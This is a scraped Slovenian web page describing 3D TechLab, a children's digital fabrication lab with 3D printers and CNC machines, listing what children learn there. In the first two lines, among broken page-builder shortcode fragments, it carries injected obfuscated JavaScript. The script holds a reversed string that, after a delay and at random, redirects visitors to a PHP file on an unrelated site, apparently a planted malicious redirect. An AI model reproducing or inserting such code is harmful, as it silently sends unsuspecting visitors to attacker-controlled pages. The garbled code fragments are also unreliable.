Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” disabled=”off”]

3D TechLab

TechLab je laboratorij za digitalno fabrikacijo. To pomeni,  da ideje, risbe in modele iz računalniških programov pretvorimo v izdelke iz trdnih materialov.

Za otroke so najbolj zanimive plastične figurice in predmeti, ki nastanejo s 3D tiskom, TechLab pa ponuja možnost ustvarjanja izdelkov tudi iz kartona, lesa in pleksi stekla. Vse počnejo stroji, ki sledijo navodilom računalniških programov (CNC-stroji). Ob teh se v TechLabu nahaja še cela vrsta druge visoko tehnološke opreme za ustvarjanje, ki pritegne ne samo otroke, pač pa tudi odrasle.

TechLab je idealno igrišče za raziskovanje novih tehnologij in povezovanje digitalnega in fizičnega sveta. Nahaja se v Tkalki in najraje izvajamo vse aktivnosti Spreten.si prav v njem.

V TechLabu peljemo otroke do naslednjih življenjskih spoznanj:

  • tehnologij se ni treba bati, pač pa je človeku v pomoč;
  • z obvladovanjem tehnologije lahko z istim trudom naredimo več izdelkov v krajšem času;
  • z znanjem rokovanja z računalnikom in stroji se da izdelati marsikaj, o čemer smo morda samo razmišljali;
  • najlažje je imeti idejo, težje je imeti uresničljivo idejo, najtežje pa je idejo uresničiti;
  • obstaja razlika v kakovosti izdelkov (npr. uporabnost, natančnost, vzdržljivost itd.);
  • za kakovosten izdelek je potrebno načrtovati in se naučiti, kar še ne znamo;

Pri tem se otroci učijo naslednje tehnične spretnosti:

  • risanje in modeliranje v 3D programih
  • uporaba tablic in mobilnih telefonov kot pomoč pri obvladovanju 3D tiska
  • rokovanje s 3D tiskalnikom in ostalimi CNC-stroji
  • pisanje/izdelovanje s 3D pisalom